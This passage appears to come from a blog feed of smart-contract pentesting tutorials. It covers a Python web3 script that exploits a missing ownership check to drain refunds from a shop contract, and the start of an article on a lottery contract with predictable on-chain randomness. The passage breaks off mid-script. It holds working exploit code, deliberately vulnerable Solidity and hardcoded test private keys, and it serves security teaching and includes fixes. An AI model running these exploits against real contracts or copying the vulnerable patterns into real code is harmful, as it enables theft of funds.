Normally, we’d expect that only the true owner of an item could return it to the shop and receive a refund. However, the current contract doesn’t actually check that the caller owns the item they’re trying to return. This oversight opens the door to an exploit where someone could “return” high-value items they don’t own and repeatedly claim refunds, potentially draining funds from the shop.

To understand how this might unfold, we’ll start by simulating some regular user activity. We’ll have a few different accounts make legitimate purchases to populate the shop with items that are now user-owned. This will help illustrate the normal flow of the contract and give us a realistic starting point before we look into how the exploit works.

After we’ve set up these purchases, we’ll dive into the exploit itself and see exactly how this lack of ownership verification can be used to take advantage of the refund mechanism. Let’s begin with the script to simulate user purchases in our shop.

## Simulating User Purchases

Before diving into any potential exploit, it’s helpful to see the contract in action through normal user behavior. Here, we’re simulating a few different users purchasing items from the shop. This gives us a sense of how the contract operates in a typical scenario and sets up some items as owned by individual users rather than the shop.

&lt;details&gt;
&lt;summary&gt;Simulating User Purchases Code&lt;/summary&gt;

```python
from web3 import Web3
import json

# Connect to the Ethereum network (e.g., Ganache or testnet)
w3 = Web3(Web3.HTTPProvider(&quot;http://127.0.0.1:7545&quot;))  # Replace with your network URL

# Replace with the deployed contract address
contract_address = &quot;0xf223CA80ec911fcf19e34c252f1180De4A718368&quot;

# %% Open the ABI
with open(&quot;MagicItemShop.json&quot;) as f:
    contract_json = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize the contract
contract = w3.eth.contract(address=contract_address, abi=contract_abi)

accounts = [
    {&quot;address&quot;: &quot;0x76e4E33674fDc3410Dc7df5E13fa4A5279028425&quot;, &quot;private_key&quot;: &quot;0xe859ec36ddd09c33cff090ea84e2560fba29c2996d9bd9cac3b0d60ddcca8a14&quot;, &quot;item_id&quot;: 0},
    {&quot;address&quot;: &quot;0xE324804B2d3018b8d3Ef7c82343af3499C897c01&quot;, &quot;private_key&quot;: &quot;0x63575a691ba6ac055c6861202668cf62e8eb5527210736f78dedb7dc3a5efa93&quot;, &quot;item_id&quot;: 1},
    {&quot;address&quot;: &quot;0xce47F784C297c0F26c654a1a956121CeEFee8CFf&quot;, &quot;private_key&quot;: &quot;0x0836982a10b4d719bd59d6dfb82ae810eebf33451ad7e9e55b799899c4ec58c0&quot;, &quot;item_id&quot;: 2},
]

# Function to simulate purchases by different accounts
def simulate_purchases():
    for account in accounts:
        # Retrieve the item details to get the price
        item = contract.functions.items(account[&quot;item_id&quot;]).call()
        price = item[3]  # Price is the fourth item in the returned tuple

        # Build the transaction to purchase the item
        tx = contract.functions.purchaseItem(account[&quot;item_id&quot;]).build_transaction({
            &apos;from&apos;: account[&quot;address&quot;],
            &apos;value&apos;: price,
            &apos;nonce&apos;: w3.eth.get_transaction_count(account[&quot;address&quot;]),
            &apos;gas&apos;: 200000,
            &apos;gasPrice&apos;: w3.to_wei(&apos;50&apos;, &apos;gwei&apos;)
        })

        # Sign the transaction with the account&apos;s private key
        signed_tx = w3.eth.account.sign_transaction(tx, account[&quot;private_key&quot;])

        # Send the transaction to the network
        tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)

        # Wait for the transaction receipt to confirm it
        tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)

        # Check if the purchase was successful
        if tx_receipt.status == 1:
            print(f&quot;Account {account[&apos;address&apos;]} successfully purchased item {account[&apos;item_id&apos;]}&quot;)
        else:
            print(f&quot;Account {account[&apos;address&apos;]} failed to purchase item {account[&apos;item_id&apos;]}&quot;)

# Run the simulation
simulate_purchases()


```
&lt;/details&gt;


In this simulation, we have three different accounts, each buying a specific item from the shop. Each account is represented by an Ethereum address and a private key. This setup allows us to simulate individual users making purchases, where each user buys an item and becomes its new owner.

Let’s walk through the code step-by-step to see how it works.

#### Setting Up the Connection and Contract

We begin by setting up the connection to the Ethereum network and loading the deployed contract. Here, we specify the network address (in this case, Ganache or another test network) and provide the contract address so that we can interact with it. We also load the contract’s ABI (Application Binary Interface) to ensure our script knows the structure of the contract and its available functions.

```python
from web3 import Web3
import json

# Connect to the Ethereum network (e.g., Ganache or testnet)
w3 = Web3(Web3.HTTPProvider(&quot;http://127.0.0.1:7545&quot;))  # Replace with your network URL

# Replace with the deployed contract address
contract_address = &quot;0xf223CA80ec911fcf19e34c252f1180De4A718368&quot;

# Open the ABI file
with open(&quot;MagicItemShop.json&quot;) as f:
    contract_json = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize the contract instance
contract = w3.eth.contract(address=contract_address, abi=contract_abi)

```

#### Defining the Accounts and Target Items

Next, we define a list of accounts. Each account is associated with an Ethereum address, a private key, and an item ID for the item they will purchase. This setup allows us to simulate different users, each buying a unique item from the shop. Here’s how the accounts are defined:

```python
accounts = [
    {&quot;address&quot;: &quot;0x76e4E33674fDc3410Dc7df5E13fa4A5279028425&quot;, &quot;private_key&quot;: &quot;0xe859ec36ddd09c33cff090ea84e2560fba29c2996d9bd9cac3b0d60ddcca8a14&quot;, &quot;item_id&quot;: 0},
    {&quot;address&quot;: &quot;0xE324804B2d3018b8d3Ef7c82343af3499C897c01&quot;, &quot;private_key&quot;: &quot;0x63575a691ba6ac055c6861202668cf62e8eb5527210736f78dedb7dc3a5efa93&quot;, &quot;item_id&quot;: 1},
    {&quot;address&quot;: &quot;0xce47F784C297c0F26c654a1a956121CeEFee8CFf&quot;, &quot;private_key&quot;: &quot;0x0836982a10b4d719bd59d6dfb82ae810eebf33451ad7e9e55b799899c4ec58c0&quot;, &quot;item_id&quot;: 2},
]

```

#### Simulating the Purchases

The core of the simulation happens in the `simulate_purchases` function. This function loops through each account in the `accounts` list, retrieves the item’s price, builds a transaction to purchase the item, signs it with the account’s private key, and sends it to the network. Let’s break it down:

1.  **Retrieve Item Price**: For each account, we first call the `items` function on the contract to get details about the item, including its price. The price is essential, as we need to send the correct amount of Ether to make the purchase.

```python
item = contract.functions.items(account[&quot;item_id&quot;]).call()
price = item[3]  # Price is the fourth item in the returned tuple

```

2.  **Build and Sign the Transaction**: Once we have the item’s price, we build the transaction to call `purchaseItem` with the item ID. We include the Ether value in `value`, as well as the sender’s address and gas details. After building the transaction, we sign it using the account’s private key.

```python
tx = contract.functions.purchaseItem(account[&quot;item_id&quot;]).build_transaction({
    &apos;from&apos;: account[&quot;address&quot;],
    &apos;value&apos;: price,
    &apos;nonce&apos;: w3.eth.get_transaction_count(account[&quot;address&quot;]),
    &apos;gas&apos;: 200000,
    &apos;gasPrice&apos;: w3.to_wei(&apos;50&apos;, &apos;gwei&apos;)
})

signed_tx = w3.eth.account.sign_transaction(tx, account[&quot;private_key&quot;])

```

3.  **Send the Transaction and Wait for Confirmation**: With the transaction signed, we send it to the network and wait for a receipt to confirm that it was mined successfully. If the status in the receipt is `1`, the purchase was successful; otherwise, it failed.

```python
tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
tx_receipt = w3.eth.wait_for_transaction_receipt(tx_hash)

# Check if the purchase was successful
if tx_receipt.status == 1:
    print(f&quot;Account {account[&apos;address&apos;]} successfully purchased item {account[&apos;item_id&apos;]}&quot;)
else:
    print(f&quot;Account {account[&apos;address&apos;]} failed to purchase item {account[&apos;item_id&apos;]}&quot;)

```

#### Running the Simulation

Finally, we call `simulate_purchases()` to execute the function. Each account will attempt to buy its designated item, and if all goes well, we’ll see a confirmation message for each purchase, confirming that the items have new owners.

![](/content/images/2024/11/image-7.png)

Purchasing items from the shop

## Exploiting the Vulnerability: Taking Advantage of Unchecked Access in `returnItemToShop`

Now that we’ve set up the shop with items owned by different users, it’s time to explore how an attacker could exploit the `returnItemToShop` function to drain funds from the contract. Due to the lack of ownership checks in this function, the attacker can trigger returns on any item, even ones they don’t actually own. This allows them to claim partial refunds on high-value items repeatedly, despite never purchasing them. Let’s walk through the code used to execute this exploit.

### Setting Up the Dependencies and Connection

First, we set up the necessary dependencies and establish a connection to the Ethereum network. The code also verifies the connection to make sure we’re properly connected before proceeding with the exploit.

```python
# %% Dependencies
from web3 import Web3
import json
import time  # To add delay between transactions if needed

# Connect to the Ethereum network (e.g., local Ganache or testnet)
w3 = Web3(Web3.HTTPProvider(&quot;http://127.0.0.1:7545&quot;))  # Replace with your network URL

# Verify the connection
print(&quot;Is connected:&quot;, w3.is_connected())


```

### Loading the Contract and Setting Up Attacker Details

Next, we load the contract and initialize the necessary details for the attacker. We provide the contract’s address, the attacker’s address, and their private key, which will allow us to sign transactions as if we were the attacker. We then load the contract ABI from the JSON artifact, so that we can interact with its functions programmatically.

```python
# %% Contract

# Replace with the deployed contract address and attacker details
contract_address = &quot;0xf223CA80ec911fcf19e34c252f1180De4A718368&quot;
attacker_address = &quot;0xa7E1Dce14Bb439e6710c18e05C0DA71EAd3d0203&quot;
private_key = &quot;0x85ebe111f9cd1878845c72b10affa75fcbf300123a70c79f01cfbf65cdcd4b50&quot;  # Attacker&apos;s private key

# Load the contract ABI from the JSON artifact
with open(&quot;MagicItemShop.json&quot;) as f:
    contract_json = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize the contract instance
contract = w3.eth.contract(address=contract_address, abi=contract_abi)

# Verify contract initialization
print(&quot;Contract initialized at address:&quot;, contract.address)


```

### Choosing the Item to Exploit

In this part, we choose a high-value item to target for the exploit. We retrieve the item’s details from the contract, including its price, which will allow us to calculate the refund amount. In this case, we’re choosing `item_id = 1` for demonstration purposes.

```python
# %% Choose the item id to exploit

# Define the item ID the attacker wants to exploit
item_id = 1  # Replace with the ID of a valuable item

# Retrieve item details to confirm
item = contract.functions.items(item_id).call()
print(&quot;Item details:&quot;, item)

# Extract price and calculate refund amount
price = item[3]  # Price is the fourth item in the returned tuple
refund_amount = price // 2  # Refund is half the item&apos;s price
print(f&quot;Price: {price} wei, Refund amount: {refund_amount} wei&quot;)

```

![](/content/images/2024/11/image-12.png)

Choosing the target

### Building and Sending the Exploit Transaction

Now we’re ready to initiate the exploit. We build a transaction to call the `returnItemToShop` function on the targeted item. The transaction includes the attacker’s address and sets a gas limit to ensure it processes efficiently. After building the transaction, we sign it with the attacker’s private key and send it to the network.

```python
# %% Transaction

# Build the transaction to call returnItemToShop on the targeted item
tx = contract.functions.returnItemToShop(item_id).build_transaction({
    &apos;from&apos;: attacker_address,
    &apos;nonce&apos;: w3.eth.get_transaction_count(attacker_address),
    &apos;gas&apos;: 100000,
    &apos;gasPrice&apos;: w3.to_wei(&apos;50&apos;, &apos;gwei&apos;)
})

# Sign the transaction
signed_tx = w3.eth.account.sign_transaction(tx, private_key)

# Send the transaction to the network
tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)

print(&quot;Transaction sent! Hash:&quot;, tx_hash.hex())

```

#### Checking the Transaction Receipt

After sending the transaction, we check the transaction receipt to confirm whether the exploit was successful. If the `tx_receipt.status` is `1`, it means the transaction was mined successfully, and the attacker would have received the refund amount. This output confirms whether the exploit has succeeded in triggering the refund for the item.

![](/content/images/2024/11/image-10.png)

Amount of Ehterium held by the attacker before running the exploit

![](/content/images/2024/11/image-13.png)

Results after running the exploit

![](/content/images/2024/11/image-11.png)

Amount of Etherium held by the attacker after running the exploit

# Fixing the Vulnerability: Adding Ownership Verification

Now that we’ve seen how the lack of access control in `returnItemToShop` opens up the contract to exploitation, let’s look at how we can fix it. The vulnerability stems from the fact that anyone can call `returnItemToShop` on any item, regardless of whether they own it. This oversight allows unauthorized users to repeatedly claim refunds for items they don’t actually own, which can drain the contract’s funds over time.

To fix this issue, we need to add a check in `returnItemToShop` to ensure that only the legitimate owner of an item can return it for a refund. By verifying the caller’s address (`msg.sender`) against the `currentOwner` of the item, we can restrict refunds to the true owner, closing off the possibility of unauthorized refunds.

#### Implementing the Fix

The fix involves adding a single line of code to the `returnItemToShop` function that checks if the caller is the item’s current owner. If `msg.sender` (the caller) doesn’t match `item.currentOwner`, the transaction will be reverted, preventing unauthorized returns.

Here’s how the updated function would look:

```solidity
function returnItemToShop(uint256 itemId) public {
    Item storage item = items[itemId];

    // **New check to confirm caller is the item&apos;s owner**
    require(item.currentOwner == msg.sender, &quot;Only the item owner can return it&quot;);

    // Refund is set to half of the original price
    uint256 refundAmount = item.price / 2;

    // Set the item ownership back to the shop
    item.currentOwner = shopAddress;
    payable(msg.sender).transfer(refundAmount);
}

```

#### How This Fix Works

With this new line, the contract first checks that `msg.sender` (the caller’s address) matches `item.currentOwner` before proceeding. If the caller isn’t the item’s current owner, the function call fails with the error message `&quot;Only the item owner can return it&quot;`. This verification ensures that only the true owner of the item can execute a return, preventing anyone else from accessing refunds they’re not entitled to.

# Conclusions

In this article, we examined a common yet often overlooked vulnerability in smart contracts: insufficient access control. By dissecting the Magic Item Shop contract, we saw how a lack of ownership checks in the `returnItemToShop` function created an exploit pathway, allowing an attacker to repeatedly claim refunds on items they didn’t own. This type of vulnerability, though easy to miss, can result in severe consequences, especially in contracts handling assets or funds.

This example highlights the importance of strict access control in smart contract security. Anytime a function involves asset transfers, refunds, or ownership changes, it’s crucial to verify that only authorized users can perform these actions. Even basic checks—such as ensuring the caller is the item owner—can make a significant difference in preventing exploits.

Key takeaways for pentesters include:

-   **Implement Ownership Verification**: Confirm that the caller is a legitimate owner or authorized user before allowing access to sensitive functions.
-   **Test for Edge Cases**: Beyond standard tests, simulate unauthorized access attempts, especially in functions that involve funds or asset management.
-   **Think Like an Attacker**: Anticipate how a malicious actor might exploit your contract, allowing you to identify and mitigate potential vulnerabilities proactively.

By applying these principles, developers and pentesters alike can better secure contracts and protect users from potential exploits. As smart contracts grow in popularity and manage larger assets, rigorous security practices have become essential.

# Resources

-   Hardhat - Ethereum Development Environment. &quot;Hardhat Documentation.&quot; Available at: https://hardhat.org/getting-started/
-   Web3.py - A Python Library for Interacting with Ethereum. &quot;Web3.py Documentation.&quot; Available at: [https://web3py.readthedocs.io/](https://web3py.readthedocs.io/)
-   Ganache - Personal Blockchain for Ethereum Development. &quot;Ganache Documentation.&quot; Available at: https://trufflesuite.com/ganache/
-   Solidity - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   OpenZeppelin - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: https://docs.openzeppelin.com/contracts
-   Ethereum - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   Solidity Security - Best Practices for Secure Smart Contracts. &quot;Solidity Documentation: Security Considerations.&quot; Available at: [https://docs.soliditylang.org/en/v0.8.0/security-considerations.html](https://docs.soliditylang.org/en/v0.8.0/security-considerations.html)</content:encoded><author>Ruben Santos</author></item><item><title>Exploiting Predictable Randomness in Ethereum Smart Contracts</title><link>https://www.kayssel.com/post/web3-2-lottery</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-2-lottery</guid><description>This chapter examines how attackers can exploit predictable randomness in a lottery contract, using Ganache to simulate the attack. It highlights the vulnerability of on-chain randomness and suggests secure solutions like Chainlink VRF.</description><pubDate>Sun, 10 Nov 2024 12:53:35 GMT</pubDate><content:encoded># Introduction

In the world of smart contracts, random number generation can be surprisingly challenging, particularly in public blockchains like Ethereum. When a smart contract attempts to generate randomness using values like the block number, timestamp, or other on-chain data, it can inadvertently expose itself to a vulnerability: **predictable outcomes**.

For example, in many lottery-style contracts, the winner might be determined based on the hash of a block combined with other known factors, such as the number of participants. While this approach may seem random, it’s actually far from it. Miners, or any user who can observe the chain, can potentially predict the outcome by manipulating the timing of transactions or repeatedly entering the lottery.

Here’s how it happens:

-   **Known Inputs**: Many contracts use predictable on-chain information—like the block number, timestamp, or total players—to calculate randomness. These values are accessible to everyone, making it possible to simulate future outcomes based on likely conditions.
-   **Miner Control**: Miners have the power to influence block properties like timestamps and can withhold blocks if it benefits them. This power gives them a potential edge to predict or even control a winner.
-   **Multi-Entry Manipulation**: In some cases, an attacker can increase their odds by joining the lottery multiple times. By carefully timing entries or controlling the number of participants, they could skew the winner selection to their advantage.

This article will dive into exactly how these vulnerabilities arise, why they pose a risk, and what makes true randomness so challenging to achieve in blockchain environments.

# The Vulnerable Contract

To demonstrate this vulnerability, we’ll use the following `Lottery` contract, which implements a straightforward approach to managing a lottery game on the blockchain. It allows users to join by purchasing tickets, after which the owner can select a winner who receives the entire balance of the contract.

&lt;details&gt;
&lt;summary&gt;Vulnerable Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Lottery {
    address public owner;
    address[] public players;
    uint public ticketPrice;
    address public winner; // State variable to store the winner&apos;s address

    constructor(uint _ticketPrice) {
        owner = msg.sender;
        ticketPrice = _ticketPrice;
    }

    // Allows users to buy tickets by sending exactly the ticket price
    function buyTicket() public payable {
        require(msg.value == ticketPrice, &quot;Invalid ticket price&quot;);
        players.push(msg.sender);
    }

    // Picks a winner based on a simple and predictable formula
    function pickWinner() public onlyOwner {
        require(players.length &gt; 0, &quot;No players have joined&quot;);

        // Calculate the winner index based on block number and players length
        uint winnerIndex = uint(
            keccak256(
                abi.encodePacked(
                    block.number, // Predictable block number
                    players.length // Known and controllable by the attacker
                )
            )
        ) % players.length;

        winner = players[winnerIndex]; // Store the winner address
        payable(winner).transfer(address(this).balance);

        // Reset the players array for the next round
        delete players;
    }

    // Returns the number of players
    function getPlayerCount() public view returns (uint) {
        return players.length;
    }

    // Returns the list of players (for testing purposes)
    function getPlayers() public view returns (address[] memory) {
        return players;
    }

    // Returns the winner&apos;s address
    function getWinner() public view returns (address) {
        return winner;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, &quot;Only the owner can call this function&quot;);
        _;
    }
}


```
&lt;/details&gt;


To start, the contract’s `constructor` is called with a ticket price specified in wei. This constructor sets the `owner` as the address that deployed the contract and stores the chosen `ticketPrice` for the lottery. Here’s the initialization code:

```solidity
constructor(uint _ticketPrice) {
    owner = msg.sender;
    ticketPrice = _ticketPrice;
}

```

With the owner and ticket price established, the contract proceeds to allow players to participate through the `buyTicket` function. This function requires users to send exactly the `ticketPrice` to confirm their participation. If they meet this requirement, their address is added to the `players` array:

```solidity
function buyTicket() public payable {
    require(msg.value == ticketPrice, &quot;Invalid ticket price&quot;);
    players.push(msg.sender);
}

```

This mechanism allows users to join the lottery as long as they send the correct ticket price in ether, automatically storing their address in `players`. As more users join, the `players` array grows, storing each participant&apos;s address and building up the contract balance from the ticket fees.

The winner selection process is handled by the `pickWinner` function, which only the contract owner can execute. This function first checks that there are participants in the lottery, ensuring that the lottery can only proceed if players have joined. If there are players, the function calculates the winner using a simple formula that determines an index in the `players` array. This `winnerIndex` is calculated based on the current block number and the length of the `players` array, as seen here:

```solidity
uint winnerIndex = uint(
    keccak256(
        abi.encodePacked(
            block.number, // Current block number
            players.length // Number of participants
        )
    )
) % players.length;


```

The calculated `winnerIndex` corresponds to an entry in the `players` array, selecting one of the addresses as the winner. The contract then transfers the entire balance to this winning address:

```solidity
winner = players[winnerIndex]; // Store the winner address
payable(winner).transfer(address(this).balance);

```

After transferring the balance to the winner, the `players` array is reset to clear all participants, preparing the contract for a new round of the lottery. This is done with the line:

```solidity
delete players;

```

The contract includes several view functions for users to monitor its state. For instance, `getPlayerCount` returns the current number of participants, while `getPlayers` provides a list of all addresses in `players`. There’s also a `getWinner` function to display the most recent winner:

```solidity
function getPlayerCount() public view returns (uint) {
    return players.length;
}

function getPlayers() public view returns (address[] memory) {
    return players;
}

function getWinner() public view returns (address) {
    return winner;
}

```

Finally, the contract ensures that only the owner can pick a winner by using a custom modifier, `onlyOwner`, which restricts the `pickWinner` function. This modifier checks that the caller is indeed the owner before allowing execution:

```solidity
modifier onlyOwner() {
    require(msg.sender == owner, &quot;Only the owner can call this function&quot;);
    _;
}

```

# **The Attack Strategy**

Here, since we’re using Ganache as our blockchain environment, we have complete control over block creation and transaction timing, which makes the attack much easier to carry out. With Ganache, we can advance blocks whenever we like and set ideal conditions for the exploit, allowing us to craft the perfect scenario for a successful outcome. This controlled setup is ideal for demonstrating the vulnerability in a straightforward way.

The exploit works by taking advantage of the lottery contract’s predictable winner selection. The contract calculates the winner based on two factors: the current block number and the number of participants. Both of these values are publicly accessible, so an attacker can time their entry or adjust the number of players to boost their chances of winning. By simulating different outcomes beforehand, they can pinpoint the best moment to join and dramatically increase their odds.

In a real-world setting, things would be more challenging. Block numbers are constantly updated by various miners, and the number of players can fluctuate, making it much harder to predict the right conditions. This simplified example with Ganache, however, lets us focus on the core vulnerability, showing exactly how an attacker could manipulate the system under ideal conditions.

## Deploying the contract

To set up the environment with Ganache and Hardhat, the process is essentially the same as in the [previous chapter](https://www.kayssel.com/post/web3-1/). Once Ganache is running and the Hardhat project is configured, we can use the following script to deploy the contract. This script leverages the `ethers` library to create an instance of the `Lottery` contract and sets a ticket price of 0.1 ether. Once deployed, it outputs the contract address to the console, allowing us to interact with the contract in our testing environment.

Here’s the deployment script:

```javascript
async function main() {
  const Lottery = await ethers.getContractFactory(&quot;Lottery&quot;);
  const ticketPrice = ethers.parseEther(&quot;0.1&quot;); // Ticket price in ether
  const lottery = await Lottery.deploy(ticketPrice);
  await lottery.waitForDeployment();

  console.log(&quot;Lottery deployed to:&quot;, lottery.target);
}

main()
  .then(() =&gt; process.exit(0))
  .catch((error) =&gt; {
    console.error(error);
    process.exit(1);
  });

```

Once the script is ready, you can deploy the contract on the local Ganache instance by running the following command with Hardhat:

```bash
npx hardhat run scripts/deploy.js --network ganache

```

## Adding users to the lottery

To interact with the contract, this time I chose Python over JavaScript. Python offers convenient tools like Jupyter notebooks, which allow for interactive code execution and easier debugging. Many modern editors support this functionality, making it more comfortable to experiment and catch errors on the go. For example, I’m currently using Zed to run the code step-by-step, which allows me to verify that everything is working correctly as I go along.

![](/content/images/2024/11/image.png)

Below is the Python script I used to automatically add participants to the lottery:

&lt;details&gt;
&lt;summary&gt;Script to add users to the lottery&lt;/summary&gt;

```python
# %% Cell 1
from web3 import Web3
import time
import json

# Connection setup
ganache_url = &quot;http://127.0.0.1:7545&quot;
web3 = Web3(Web3.HTTPProvider(ganache_url))

# Check connection
if not web3.is_connected():
    print(&quot;Error: Unable to connect to Ganache&quot;)
else:
    print(&quot;Connected to Ganache&quot;)

# %% Cell 2
# Contract address and ABI (replace with actual contract address)
contract_address = &quot;0x3da1c86DB9fa85Ba45Cf2DDf5205d41a964800d2&quot;

# Load the ABI from a JSON file
with open(&quot;Lottery.json&quot;) as f:
    contract_json = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize contract
lottery_contract = web3.eth.contract(address=contract_address, abi=contract_abi)
print(&quot;Contract initialized&quot;)

# %% Cell 3
# Replace these with actual Ganache accounts and private keys for testing
players = [
    {&quot;address&quot;: &quot;0x76e4E33674fDc3410Dc7df5E13fa4A5279028425&quot;, &quot;private_key&quot;: &quot;0xe859ec36ddd09c33cff090ea84e2560fba29c2996d9bd9cac3b0d60ddcca8a14&quot;},
    {&quot;address&quot;: &quot;0xE324804B2d3018b8d3Ef7c82343af3499C897c01&quot;, &quot;private_key&quot;: &quot;0x63575a691ba6ac055c6861202668cf62e8eb5527210736f78dedb7dc3a5efa93&quot;},
    {&quot;address&quot;: &quot;0xce47F784C297c0F26c654a1a956121CeEFee8CFf&quot;, &quot;private_key&quot;: &quot;0x0836982a10b4d719bd59d6dfb82ae810eebf33451ad7e9e55b799899c4ec58c0&quot;},
    {&quot;address&quot;: &quot;0x4154F4926135C31e8d9E88F83D8eaFe2749c4189&quot;, &quot;private_key&quot;: &quot;0xc4b5c6855187945c62f7148b3d1ad66ec23a8add6042ea64f27a46dff4d078f0&quot;}
]

# Set the ticket price in wei
ticket_price = web3.to_wei(0.1, &quot;ether&quot;)

# Loop to add each player to the lottery
for player in players:
    tx = lottery_contract.functions.buyTicket().build_transaction({
        &apos;from&apos;: player[&quot;address&quot;],
        &apos;value&apos;: ticket_price,
        &apos;gas&apos;: 2000000,
        &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
        &apos;nonce&apos;: web3.eth.get_transaction_count(player[&quot;address&quot;]),
    })

    # Sign the transaction with the player&apos;s private key
    signed_tx = web3.eth.account.sign_transaction(tx, player[&quot;private_key&quot;])
    tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
    receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
    print(f&quot;Player {player[&apos;address&apos;]} joined the lottery.&quot;)

```
&lt;/details&gt;


And here It&apos;s a little explanation of the code (In case you understand more or less how it works you can pass to the next section)

The script begins by setting up a connection to Ganache, a local Ethereum blockchain simulator, using the `web3` library. It connects via HTTP at the default Ganache address (`127.0.0.1:7545`). This step ensures that we’re connected to a blockchain environment where we can deploy and interact with our contract.

```python
ganache_url = &quot;http://127.0.0.1:7545&quot;
web3 = Web3(Web3.HTTPProvider(ganache_url))

# Check connection
if not web3.is_connected():
    print(&quot;Error: Unable to connect to Ganache&quot;)
else:
    print(&quot;Connected to Ganache&quot;)

```

Once connected, the script needs to know the deployed contract’s address and ABI (Application Binary Interface) to interact with it. The ABI describes the contract’s functions and is generated by the Solidity compiler. Here, the ABI is loaded from a JSON file, which was generated during the contract compilation process.

```python
# Contract address and ABI (replace with actual contract address)
contract_address = &quot;0x3da1c86DB9fa85Ba45Cf2DDf5205d41a964800d2&quot;

# Load the ABI from a JSON file
with open(&quot;Lottery.json&quot;) as f:
    contract_json = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize contract
lottery_contract = web3.eth.contract(address=contract_address, abi=contract_abi)
print(&quot;Contract initialized&quot;)

```

To simulate participants joining the lottery, the script defines a list of player accounts, each with an associated private key (these are test accounts from Ganache). This allows the script to execute transactions on behalf of these accounts, which will be used to call the contract’s `buyTicket` function.

```python
# Replace these with actual Ganache accounts and private keys for testing
players = [
    {&quot;address&quot;: &quot;0x76e4E33674fDc3410Dc7df5E13fa4A5279028425&quot;, &quot;private_key&quot;: &quot;0xe859ec36ddd09c33cff090ea84e2560fba29c2996d9bd9cac3b0d60ddcca8a14&quot;},
    {&quot;address&quot;: &quot;0xE324804B2d3018b8d3Ef7c82343af3499C897c01&quot;, &quot;private_key&quot;: &quot;0x63575a691ba6ac055c6861202668cf62e8eb5527210736f78dedb7dc3a5efa93&quot;},
    {&quot;address&quot;: &quot;0xce47F784C297c0F26c654a1a956121CeEFee8CFf&quot;, &quot;private_key&quot;: &quot;0x0836982a10b4d719bd59d6dfb82ae810eebf33451ad7e9e55b799899c4ec58c0&quot;},
    {&quot;address&quot;: &quot;0x4154F4926135C31e8d9E88F83D8eaFe2749c4189&quot;, &quot;private_key&quot;: &quot;0xc4b5c6855187945c62f7148b3d1ad66ec23a8add6042ea64f27a46dff4d078f0&quot;}
]

```

This part of the script loops through each player in the `players` list, simulating a ticket purchase for each one. It creates a transaction by calling the `buyTicket` function on the contract, sets the ticket price in wei, and assigns necessary parameters like `gas` and `nonce`.

```python
# Set the ticket price in wei
ticket_price = web3.to_wei(0.1, &quot;ether&quot;)

# Loop to add each player to the lottery
for player in players:
    tx = lottery_contract.functions.buyTicket().build_transaction({
        &apos;from&apos;: player[&quot;address&quot;],
        &apos;value&apos;: ticket_price,
        &apos;gas&apos;: 2000000,
        &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
        &apos;nonce&apos;: web3.eth.get_transaction_count(player[&quot;address&quot;]),
    })

```

Each transaction needs to be signed by the player’s private key before it can be sent to the blockchain. The script signs the transaction using `web3.eth.account.sign_transaction`, then sends it with `web3.eth.send_raw_transaction`. After sending, it waits for the transaction to be confirmed and prints a message indicating that the player has successfully joined the lottery.

```python
    # Sign the transaction with the player&apos;s private key
    signed_tx = web3.eth.account.sign_transaction(tx, player[&quot;private_key&quot;])
    tx_hash = web3.eth.send_raw_transaction(signed_tx.raw_transaction)
    receipt = web3.eth.wait_for_transaction_receipt(tx_hash)
    print(f&quot;Player {player[&apos;address&apos;]} joined the lottery.&quot;)

```

## **Selecting the Winner**

In this section, I won’t go over the connection setup or how we initialize the contract with the ABI, as that was covered in detail in the previous section. Instead, we’ll jump straight into how the script works to retrieve the current players, select a winner, and award the prize.

&lt;details&gt;
&lt;summary&gt;Select winner script&lt;/summary&gt;

```python
from web3 import Web3
import time
import json

# Connection setup
ganache_url = &quot;http://127.0.0.1:7545&quot;
web3 = Web3(Web3.HTTPProvider(ganache_url))

# Check connection
if not web3.is_connected():
    print(&quot;Error: Unable to connect to Ganache&quot;)
else:
    print(&quot;Connected to Ganache&quot;)

# Contract address and ABI (replace with actual contract address)
contract_address = &quot;0x3da1c86DB9fa85Ba45Cf2DDf5205d41a964800d2&quot;

# Load the ABI from a JSON file
with open(&quot;Lottery.json&quot;) as f:
    contract_json  = json.load(f)
    contract_abi = contract_json[&quot;abi&quot;]

# Initialize contract
lottery_contract = web3.eth.contract(address=contract_address, abi=contract_abi)
print(&quot;Contract initialized&quot;)

# Owner&apos;s address and private key
owner_address = &quot;0x68F99487Ad21cE05859C38Cc8B2a1f78fA452cE8&quot;  # Replace with the owner&apos;s address
owner_private_key = &quot;0xd6d215c98c4fd42ddb7b1a8ab89275bc284412267ef3f300cb61ef6fcb0d4d4e&quot;   # Replace with the owner&apos;s private key

try:
    # Retrieve and print the list of players with their indices
    players = lottery_contract.functions.getPlayers().call()
    print(&quot;Current players in the lottery:&quot;)
    for index, player_address in enumerate(players):
        print(f&quot;Index {index}: {player_address}&quot;)
    # Build the transaction to call pickWinner
    tx = lottery_contract.functions.pickWinner().build_transaction({
        &apos;from&apos;: owner_address,
        &apos;gas&apos;: 2000000,
        &apos;gasPrice&apos;: web3.to_wei(&apos;50&apos;, &apos;gwei&apos;),
        &apos;nonce&apos;: web3.eth.get_transaction_count(owner_address),
    })

    # Sign the transaction with the owner&apos;s private key
